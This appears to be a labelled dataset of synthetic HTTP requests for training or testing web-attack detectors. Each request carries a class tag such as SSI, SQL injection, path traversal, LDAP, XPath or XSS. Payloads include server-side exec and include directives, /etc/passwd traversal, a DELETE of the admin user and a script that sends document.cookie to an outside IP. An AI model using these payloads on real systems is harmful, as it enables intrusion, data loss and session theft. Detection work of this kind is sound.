X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39435
Start - Id: 40573
class: SSI
GET /F6/a4M_ZSH/nVONwUh-/wain9processing-instruction/9wY_C5-/axRdCy/anxxuHkuZZ46kEa3rD/mNi3_unaMV9jWH/sBCKBMYVs1beN/rhe.cfm?s6nef=iexecreD%28lun&fn4us=%3C%21--++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&hE9lqaesbe=86&tzRDf6LaUUY=s&oys9tioehmrupL=935386&neS3twlondo=ePmiQZg%40H. HTTP/1.1
Host: www.riitDcJ9is.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese;q=0.7, isiri-3342;q=0.3, iso-2022-jp, x-mac-arabic
Accept-Encoding: *;q=0.8
Accept-Language: ic-E6Aerto, sktnqct-Npao6, hbnsBO-tl;q=0.9, 38ospb-E;q=0.0
Cache-Control: only-if-cached
Client-ip: 172.74.200.100
Cookie: EmolgetmAllyyn=30;object7Syd0=leOsdd'y;sea6coaoEe=23732428;Hslr9vpur=19231
Cookie2: $Version="3"
Date: Fri, 07 Jul 06 11:23:57 GMT
ETag: "FnQikxnnlglOXVUA1"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sat, 29 Dec 07 05:21:54 CET
If-Unmodified-Since: Mon, 16 Jan 06 20:37:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9760
MIME-Version: 7.9
Pragma: ueo='Teo'
Proxy-Authorization: Digest nc=fd1FECD3
Authorization: Basic c1JTbmlyc2Q6bXRyMGZlbWw=
Range: -296381
Referer: /4cohyNn/ohsh/h0pa9.php4
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/8.9 (compatible; mnPatea6hh; Mac OS X; ynsl; oaesotfeew)
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: WinNT
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: identity
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 26.88.83.25
X-Serial-Number: 56779
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40573
Start - Id: 46112
class: PathTransversal
PUT /3n/5r1inintv4e/8c6/mrD@fKg6iNjK/-0styleT/_Hboot.ini@-B/RrlnnU.jpeg? HTTP/1.1
Content-Length: 122
Content-Language: ue
Content-Encoding: gzip
Content-Location: http://sgendb.net/7tlsdWnH/nrte8/tsciih.pdf
Content-MD5: bmxhd25Tb2xidW1mY2lpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Apr 05 01:53:06 UTC
Last-Modified: Wed, 04 Feb 09 09:06:43 UTC
Host: www.ot4sdmn.uk
Connection: 0a5ched
Accept: application/zip, application/*;q=0.7, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 78.173.68.149
Cookie: teefSzzicHdhg=rByipAvyBS_J
Cookie2: $Version="6"
Date: Sat, 09 Jul 05 05:52:29 UTC
ETag: W/"tezP7LWPcMvfNfn.@"
Expect: 100-continue
From: sneTb@ntoa.org
If-Modified-Since: Fri, 22 Feb 08 04:50:15 UTC
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "7daUXr4sMREv4k@w11R"
If-None-Match: *
If-Range: *
Max-Forwards: 428
MIME-Version: 2.9
Pragma: rP='en'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Digest nonce
Range: -03018,-4474
Referer: http://2ai5.com/soaw.swf
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: lfie7 (tDO.y@gmS; egok@S; eP1.YNH; tvfKLTQ_)
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: FTP/7.7 www.ezo6eiCe.css, 5.4 www.eeotiee0.jpg, FTP/3.3 87.79.168.17:4
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8fadoyht2=5 Ewconnectn&wi3ewdms=44458&ax=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html

End - Id: 46112
Start - Id: 40516
class: SSI
GET /akaaos/3Ljxgd_eval35IAn/zcodqrhinhoaMrnoi/io/tuabjUp6/twvoroerok.tiff?rnt1iw=nSAbUm&uln=yFnv&aAirknichNt4=j&nstteokrta=hM+tltSdEsaws%28&kVTDvbscriptH=mtsaeupdateCarall1roof&icut0iw3=42492&deEfEaP5m=ryetaoi6eo&yidnupexn=39&eRvehidethjjiew=om%40.j-U9h8f.&c8oEox3pacAbibm=%3C%21--+%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&staoOheuilz=Des%3Be+8EtuA&G7K14m2=c9VPdPu&20Rn=passthru HTTP/1.1
Host: www.nnnc7.biz:80
Connection: keep-alive
Accept: video/mpeg;q=0.4, text/*;q=0.8, text/html;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=81720
Client-ip: 158.148.52.83
Cookie: oZb_n7=9080660817;thhfarsu7aa=538133;uuhtnoSqethtt7e=egncopyr;tgsT1Mey=arlQ;en461r1=500884445
Cookie2: $Version="480"
Date: Sun, 05 Dec 04 20:29:41 CET
ETag: W/"0HCHGnCBnWhjG4@"
Expect: easvet2=R7howlie
From: ahew8h@v0rtaRr.ch
If-Modified-Since: Thu, 08 Oct 09 04:00:32 UTC
If-Unmodified-Since: Tue, 04 May 04 05:37:21 GMT
If-Match: "pVqsDZeXGRcdjc."
If-None-Match: *
If-Range: Sun, 27 Sep 09 08:57:39 GMT
Max-Forwards: 547
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: mmone heot=htan
Authorization: NTLM ZXR3MUVsdGhodEhnaWZzb3Rub0VhcmE2ZG9laWpEYWVlbWhlbnBtNGQwaWQ=
Range: 9539-,9338-,-3373
Referer: http://www.ldhoa.com/diaoyEe0/e5gyBoc.jpg
TE: gzip,trailers,trailers
Trailer: If-Modified-Since
User-Agent: l81_LTm_L http://www.torzum.fr
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 278x2627
Via: 2.4 www.otuoerr.htm, 5.2 www.t9rqsltB.js
Transfer-Encoding: compress
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40516
Start - Id: 35243
class: SqlInjection
GET /0AmfromadFR.21./iVBAWqw6@GIuOHV5cW8l/@locationbetweenwgetE/iyhie6hi/SE7LorHZBolocationsTq/03ehqhpro0hipiqtcot1/pseua/rrvAuaonhfant/1@ycopyDqa.msf?lpruezszloRi=oo4oor&RinzucyrOue5=rmeta9b&hxiJ=6aseoOt%27+%29%3BDELETEFROMusersWHEREupper%28username%29+%3D+upper%28++++%27admin&nipi5kn8aMta1m0=32605&Siiifb=cHnnyaf6wroi&tad9chlteyaae8=rfkfytc+8n5&ajetewmu3=2t6iklM5csbb&01ipe1l=ktst&meokpo=oi%5Ddocument&sUo=i1%29cN HTTP/1.0
Host: 187.185.4.7
Connection: HtNa5xk
Accept: */*;q=0.3
Accept-Charset: x-mac-korean, iso-2022-jp, windows-1254;q=0.5, cp-950;q=0.4
Accept-Encoding: 
Accept-Language: t-e, rfhiata-e0sir, eno-rt1ev;q=0.7, ANttes-5;q=0.5
Cache-Control: max-stale=106
Client-ip: 61.19.198.20
Cookie: irhwhsou7x=eVnkl;anwsns=s4e;rwougk4Fiie=diia;MsgP=f 3group byc7zxfn7itee:s;swh8ht=28760;2o=nes
Cookie2: $Version="78"
Date: Tue, 24 Apr 07 19:33:33 CET
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: eanchR@cq4m.gov
If-Modified-Since: Sat, 08 Jan 05 11:57:59 CET
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: *
If-Range: "DHdhqF2KTLqOpkX"
Max-Forwards: 3909
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic MW84clFpcnM6aXVnaA==
Authorization: Basic eTZlNDpocmdzSQ==
Range: 233007-
Referer: http://www.2eey6mh.biz/jwer.fgf
TE: gzip;q=0.1,deflate;q=0.7,trailers
Trailer: Warning
User-Agent: Mozilla/3.0 (X11; U; Open BSD i586 8.5; qr-es; rv:6.4.7) Gecko/81578651
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: HTTP/4.5 103.188.40.183, FTP/6.5 253.143.108.102
Transfer-Encoding: yfqcxb; eikstlig=nie7
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35243
Start - Id: 45121
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.eN115ipOa1.cz
Connection: close
Accept: image/gif;q=0.5, audio/x-wav, image/jpeg;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Fe2ae7-hddyi, oeg4-r;q=0.4, r-c;q=0.5, dooPooya-necdanar
Cache-Control: no-transform
Client-ip: 189.198.0.35
Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="35"
Date: Sat, 28 Feb 04 22:21:31 UTC
ETag: W/"M6@cazmkokCWUTxYz"
Expect: uhxrdEf=ynXs4rl3
From: lmfapce@abHed.be
If-Modified-Since: Fri, 30 Dec 05 12:13:28 GMT
If-Unmodified-Since: Fri, 24 Dec 04 09:38:44 UTC
If-Match: *
If-None-Match: "UmH3kYZ5rR1lfwb4.D"
If-Range: Fri, 18 Aug 06 05:02:11 CET
Max-Forwards: 1
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: http://www.meoia0t.com/ynJi0Ts3.fgf
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 7.1; rx-hI; rv:8.6.0) Gecko/04460489
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: 6.6 www.tktth.jpeg:12
Transfer-Encoding: identity
Upgrade: tist/2.4, eyl/9.6
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: -------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45121
Start - Id: 41288
class: SqlInjection
GET /n_jX/PQtadmin0wrI3/tAnoah/e@aCG2Jxqe424M/hgnmtblt2lGdbt/IsetlpE2uetm/6hj2tl/B@zT9GAk/i6hOa4e/nHSMkBr.png?eT=u27e&cEz1heuqianll=fe&YAB5z=iVazU4&c0ie4lhd=rcxtgp3nae&TH_hTLkzsystem=catjao8&wImtd3pov6=ihavingemrL&nt=rimexecssgsf HTTP/1.1
Host: 47.119.231.25
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.2
Accept-Encoding: *
Accept-Language: olpld2-stdolt, nS-Nnrwr6h5, dra-ghxaosjo;q=0.6
Cache-Control: no-cache
Client-ip: 187.61.163.70
Cookie: t16nyhte2dy=iyD2e;s4ar7l=e-IAvA6.TL;chY=eotzoAm;ooatdnet=qwer' or    icrhjw_v.Account='Ntn@afCsn.com
Cookie2: $Version="29"
Date: Wed, 04 Jan 06 04:36:08 UTC
ETag: "LJqmgcgLFKZLG_VI6q.-"
Expect: stcobsBr=erAnr
From: muieo@6epi3hss.fr
If-Modified-Since: Sat, 24 Jan 09 22:04:44 GMT
If-Unmodified-Since: Fri, 28 Mar 08 03:56:37 UTC
If-Match: *
If-None-Match: "jc6uRbXx_5at6Ra"
If-Range: *
Max-Forwards: 3031
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: 2Toi zCgjsab1=0cdocs
Authorization: ekst Isde=I5e4
Range: 023622-2196,87-043
Referer: http://www.AWor.be/eiF2bhy/00sc/ridiop5/strpaz5/eiqrs.mpg
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 8.8; hl-ir; rv:8.0.5) Gecko/91440647
UA-CPU: PowerPC
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color32
Via: 7.5 185.37.15.109:28, 1.9 213.12.210.254, 9.6 www.gtr050O.shtml
Transfer-Encoding: deflate
Upgrade: tU5/4.7, t0e/4.3, aIbrw/2.1, hhrhs/1.6, xgnb/2.6
Warning: 394 www.weersiR.gif "aniskp" "Tue, 27 Apr 04 18:40:06 UTC"
X-Forwarded-For: 90.26.199.114
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41288
Start - Id: 46269
class: PathTransversal
GET /4yuHuEn7p/creie/utznttheoSealw/nUu2943wTA/jTpJO.FuU6LM0/tidnhAaeie3dtrtGo/pf4cTiKc6tV8CQ8k1xp/ashr56zcoihnheo/nOROm36aahshti4deyN/9u.cgi?o4ese=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: 115.116.101.155
Connection: adAe
Accept: application/*;q=0.6, audio/x-wav;q=0.5
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 117.131.231.99
Cookie: kedEl=e~;te=tto;60iarnxblit6efs=apw
Cookie2: $Version="45"
Date: Thu, 29 Jul 04 23:23:42 UTC
ETag: W/"zjbRV5pdy3nxjAnt"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Tue, 23 Oct 07 15:14:55 GMT
If-Match: "OC.S91f7VOZZ5ai6"
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest uri=http://jnnte.ch/cre5lhut/onigo/0t2iftsi/AfeeT.mpeg
Range: 77429-
Referer: /vteI/ignlieaf/itse.png
TE: gzip;q=0.8,chunked,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: TdEyrselh3trt
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/0.2 www.sRNsgg.html, ujfcs/2.6 www.sqyen.shtml, 7.3 www.8edleuoe.css:4
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 687 www.ndt99mt.png:13587 "extsrsgust" "Thu, 14 Feb 08 08:06:55 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46269
Start - Id: 40063
class: SSI
GET /c0ULNxEIvlHRbjP7U/Vb/rsyarmoheaoohome1f/3zgQabrih8V/eOGwukYsKhnpH5K/T01y6C-P05telnetdivtRC.php3?esI0ntpk=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fls+++++-l+%2Fhome%2F0kn%2Ffhfh%22++++--%3E&asdauauaz=ihwzsnOili9&O8x0G4J=xN4cyfcltc HTTP/1.1
Host: www.6KbarKpwge.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: rhonpj-aHC
Cache-Control: no-transform
Client-ip: 152.166.126.235
Cookie: 2mwcmOKnKEHe=pelogmhs
Cookie2: $Version="35"
Date: Wed, 31 Dec 08 02:43:42 CET
ETag: W/"kZJu3IoTYGcSKFBiD@c"
Expect: ursla2l
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Thu, 05 May 05 13:11:30 GMT
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: "cFKzUqSlAUnHE9eoX"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic NnRpYWQ6cmU3cnRxMQ==
Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 0-,976-,082-
Referer: http://oAtgfb.net/eErerDdi/patHa/nrexn/epici/ea9peei.php3
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 0BjSkoJ9g http://www.taoe3m.ch
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8002x1361
Via: FTP/3.7 www.pnXQap.html
Transfer-Encoding: compress
Upgrade: ToKh/4.1, goe/9.9, moax/0.8
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 827844806951903095
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40063
Start - Id: 41247
class: SqlInjection
GET /.8Z2fX4a/m@fWOOYSe/s5nTr2s.swf?Gahth057ca2=hdG%3B5Nea%7Cqp4homer%3A&qn5nstdin=96348927&pmrdehah4Tons=raqTdmprfae&eEi=kcNfs&cnt=%29%3F&90abaEoeScer6tC=psegin+loraiD%2BABleeexecp HTTP/1.0
Host: 194.236.72.124
Connection: mtat
Accept: text/plain;q=0.0, application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: krt-oeSh;q=0.4
Cache-Control: max-age=344
Client-ip: 156.64.250.125
Cookie2: $Version="05"
Date: Sat, 20 Nov 04 12:44:44 CET
ETag: W/"WlUY4akcWYS1xairVzVb"
Expect: auPvos
From: YipHgse@Wh0aus.de
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 21 Jul 06 19:29:02 UTC
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: Fri, 31 Mar 06 09:07:26 GMT
Max-Forwards: 59
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: Digest nc=Bba58bDA
Authorization: Basic aUlnRWF1OmltZFhpZg==
Referer: http://omesn.uk/4lFg.js
TE: chunked,trailers,gzip;q=0.7
Trailer: Warning
User-Agent: OR  'fu5' LIKE   'Sim%'
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: compress
Upgrade: nI4c/2.6
Warning: 092 www.sRueG.htm:35899 "atSmsu2feBlep0ass3" "Fri, 30 Jun 06 18:47:30 CET"
X-Forwarded-For: 119.121.155.105
X-Serial-Number: 48880057053
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41247
Start - Id: 37430
class: LdapInjection
GET /qmjm4FU3/tte3/iZ9dwHurm6m6b0LAMX/niohr/suxujn/dyXwdyjsBn9/saiWxH4Jr9NGJ2ab-Uio/eksnlbJJerhcitong/ljTNjG18Q.gif?woTstr8custw=35471951&SFyg9rdic=m9_Z1&Hgroup byhnCW=aS5A&j9uxDbody5=%5Cfrom+perl&FQ0Ojnph-4cvbscriptFscript=1e&eCl9php=1 HTTP/1.1
Host: 83.129.100.210
Connection: PtGe6het
Accept: */*;q=0.8
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: compress;q=0.9, compress
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 52.162.191.12
Cookie: UaIhhas=cbukah8alf7;tsoebw=) (|(displayName=had*) (name =   had* )(  mail=had*  );udoiaxb=7;G.zM=tnr;Oomteesopnrtvt=optvar
Cookie2: $Version="8"
Date: Wed, 12 Sep 07 05:49:30 GMT
ETag: W/"AaCc-4-zIryMfCp-2Un"
Expect: sqy5tht=eBtr
From: iniarr@ae8ees.st
If-Modified-Since: Tue, 27 Oct 09 04:32:16 UTC
If-Unmodified-Since: Thu, 01 Oct 09 16:26:08 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Nov 08 15:58:34 GMT
Max-Forwards: 44
MIME-Version: 1.8
Pragma: eotka=8
Proxy-Authorization: Basic ZnNybE86b3NzcmRl
Authorization: Digest qop=auth
Range: 7-824579
Referer: http://www.ey6mmqtj.net/meiheTt.ace
TE: trailers
Trailer: If-Modified-Since
User-Agent: MNtp33 (shMTrhKkH)
UA-CPU: Sparc
UA-Disp: 1171,1372,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2354x7109
Via: HTTP/5.7 www.osrmLe.gif
Transfer-Encoding: identity
Upgrade: tNlTm/0.9, cta8T/8.8, wwlEn/3.1, o9lne9/1.6, 2ee4Ai/5.8
Warning: 631 www.iErtre.shtml "1kti" 
X-Forwarded-For: 89.11.66.103
X-Serial-Number: 72751646141321636883
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37430
Start - Id: 49072
class: XPathInjection
GET /7qftpZE7a8ncP/h@SU.asp?e9s0n=esaw5&yCOko=fdTf&aslx4eunnaw=rers%2Fa%2Flseao%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D395%5D+++++or+%27n3htr%27+++%3D+%27 HTTP/1.1
Host: 146.3.37.11
Connection: close
Accept: application/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: rXTv7-htOt, alrnocil-tmnanoed
Cache-Control: max-stale=7507
Client-ip: 172.17.138.252
Cookie: vlse=10
Cookie2: $Version="08"
Date: Wed, 02 Nov 05 24:20:18 GMT
ETag: "FxFGVkKbgEi3wINjXU0"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Wed, 25 Feb 04 10:49:38 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: *
If-None-Match: "n-qE_YToRSrNKuX"
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 79
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="h9eeeY"
Authorization: NTLM U2VoMXRydHllZ3J5OHNvbG0wdGlzdGFxamJrb2lvZXNnM2Rzb0Yy
Range: -1977
Referer: http://www.pkrl.com/xtyoemyh/ieccee/nosonp/r3en51e/lxoatee.php
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 9.6; 8e-to; rv:2.9.5) Gecko/14041102
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: 3.1 114.189.102.33, 4.8 239.225.127.206, 4.3 78.0.143.62:3721
Transfer-Encoding: compress
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49072
Start - Id: 47021
class: XSS
GET /rlfQv5j/dIcIXP-wP_/l7P1gA/tlEbe4eltpfo/yttmhlsSd1/ixmlBkG-@E/ou/CiOnttehutowjCe/heHuI9w_MYne.nsf?winnt.XJXTm58l=nWrwt-%40jH&Ie=ah%29nhn1tdUsepassthruservices&hm3l=s2du8&n1ghlyncsiybrde=6194691&ttfnnabbesi=%25Tmo&nuoirc32d=%3Ca+++++href++%3D%22++about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F50.154.80.94%2Feticnd.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E++%22+++%3E&ftsAm1adobu=th HTTP/1.1
Host: 130.245.159.118
Connection: ijac
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.9, koi8, windows-1253, windows-1250;q=0.9
Accept-Encoding: 
Accept-Language: oo-cDrE;q=0.7, d-npDhr6xh;q=0.2, tlimnau-l, r-sde
Cache-Control: no-store
Client-ip: 113.178.205.82
Cookie: t3nnokyihnont=sktliyiuthkneont;nhi=3527532;faatti=eewiZynYGt
Cookie2: $Version="206"
Date: Fri, 23 Jan 04 22:03:54 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: ntsa=smauIax;uoyhoS=rns3ee
From: Desiah@eghc.be
If-Modified-Since: Fri, 20 Aug 04 21:56:04 CET
If-Unmodified-Since: Wed, 12 Oct 05 19:12:48 GMT
If-Match: *
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: *
Max-Forwards: 412
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: guaey ansi2ou=Anhkil5
Authorization: Basic bXN1aUFoZTpsZXk1cw==
Range: 72764-,7458-792763,4112-2767
Referer: http://o6tjc.st/ihage/ei9iet/n7ndt/eliobntm.wav
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: SRTiseyft
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: s3t/8.4 172.50.191.192
Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47021
Start - Id: 38751
class: LdapInjection
GET /aluhU-GP@9cZ0WAET.gif?oboot.iniRm9WF=h27UysPwindow.opene1Zscriptd&rEi9orxh=idTk6SbqOM&jeoodeoes3=%29+++%28++%7C++++%28+++cn%3D*o+%27brien*+%29%28mail++%3D*o++++%27brien*++++%29++&eiwcm=mn5WvtLHorr&rAs6Cde2e=294&tdittTT1Trtnt=yie&obsraetajnrhN9u=6&eeneaaf=Luvb7l5de&4satrW=28479998&XEFzf=eobi%28&ti5nse2e1=salrhortl HTTP/1.0
Host: www.uroi.ch
Connection: seuud
Accept: */*;q=0.9
Accept-Charset: utf-7, cp-932, iso-2022-kr
Accept-Encoding: gzip;q=0.1, compress, gzip;q=0.6, deflate;q=0.6, gzip;q=0.6
Accept-Language: f-hp, ilosjo-rltskrti;q=0.0, s5r5iv-eanc;q=0.0, 9sqGi5-iro4, trauaU9-eieglno
Cache-Control: no-store
Client-ip: 111.176.120.104
Cookie: Etrd=nz;reah0TsoTdl=ded;eOoanxseSeHj=ftstpasswd;Oraofeoh1Xsofob=mlatt o0execrreetl;ecn3AhsgF1sG=i2ra
Cookie2: $Version="175"
Date: Sun, 15 Jun 08 15:23:11 GMT
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: "7-pb-x1k3IqGY8PdeDlx"
If-Range: *
Max-Forwards: 2
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Digest uri=/haeus.wav
Range: -6168,6-
Referer: /Aineq/aehA/c0htt/cvsiroeT.aspx
TE: chunked
Trailer: Date
User-Agent: fiohoz
UA-CPU: MIPS
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 2.3 47.231.97.55:0
Transfer-Encoding: deflate
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38751
Start - Id: 37824
class: LdapInjection
